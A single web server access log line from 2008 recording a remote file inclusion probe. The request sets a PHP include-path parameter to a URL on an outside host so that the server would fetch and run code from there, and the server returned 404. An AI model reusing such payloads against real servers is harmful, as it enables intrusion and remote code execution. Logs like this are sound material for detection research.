59.124.30.101 - - [16/Mar/2008:08:00:52 -0700] "GET /logs/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.cv-trabajo.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
